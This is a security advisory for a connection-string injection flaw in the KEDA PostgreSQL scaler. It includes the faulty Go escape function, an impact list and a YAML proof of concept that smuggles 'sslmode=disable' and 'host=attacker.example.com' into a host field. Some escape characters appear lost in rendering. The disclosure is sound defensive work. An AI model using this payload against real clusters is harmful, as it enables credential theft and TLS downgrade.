PT-2026-56307 · Go · Github.Com/Kedacore/Keda/V2
Publicado
2026-07-07
·
Atualizado
2026-07-07
·
CVE-2026-53572
CVSS v3.1
5.9
Média
| Vetor | AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N |
Summary
pkg/scalers/postgresql scaler.go builds libpq-style connection strings by concatenating key=value pairs separated by spaces. Each tenant-controllable field (host, port, userName, dbName, sslmode) is passed through escapePostgreConnectionParameter:go
func escapePostgreConnectionParameter(str string) string {
if !strings.Contains(str, " ") {
return str // returned as-is for any non-space whitespace
}
str = strings.ReplaceAll(str, "'", "'")
return fmt.Sprintf("'%s'", str)
}The function only escapes when a literal space is present. Per libpq/pgx documentation, parameters are also separated by tabs, newlines, carriage returns, and form feeds, and backslashes are parsed inside quoted strings. Because those characters are not detected, a tenant-supplied value like
mydbtsslmode=disablethost=attacker.example.com splits into additional key=value tokens when parsed by pgx, injecting attacker-controlled connection parameters.Vulnerable code
pkg/scalers/postgresql scaler.go, lines 155–164 and 250–257.Impact
Tenants with the ability to create a
TriggerAuthentication or ScaledObject that populates any of host, port, userName, dbName, sslmode can:- Force
sslmode=disableon a connection that the cluster owner intended to be TLS-only — silently downgrading to plaintext and enabling on-path MitM. - Redirect the connection to an attacker-controlled host (
host=...) to steal the credentials the operator supplies via thepassword=keyword. - Append arbitrary libpq runtime parameters (
options=,application name=,target session attrs=) to pivot behavior.
Note: the password parameter is appended last in
buildConnArray, which limits but does not eliminate credential exfiltration — injected host= still redirects the subsequent password= keyword's target.Proof of concept
yaml
triggers:
- type: postgresql
metadata:
host: "legit.db.svctsslmode=disablethost=attacker.example.com"
port: "5432"
userName: "keda"
dbName: "metrics"
sslmode: "require"
query: "SELECT 1"After
escapePostgreConnectionParameter (no space → returned unchanged), the resulting connection string is parsed by pgx into parameters that include host=attacker.example.com and sslmode=disable.Suggested fix
- Escape / reject any ASCII whitespace (
t,,r,f,v, space) and backslash. - Prefer the URI form (
postgres://user:pass@host:port/db?sslmode=require) with proper URL-encoding. - Validate each field against an allow-list pattern before use.
Resources
pkg/scalers/postgresql scaler.go- libpq connection string parsing: https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-CONNSTRING
Correção
SQL injection
Special Elements Injection
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Github.Com/Kedacore/Keda/V2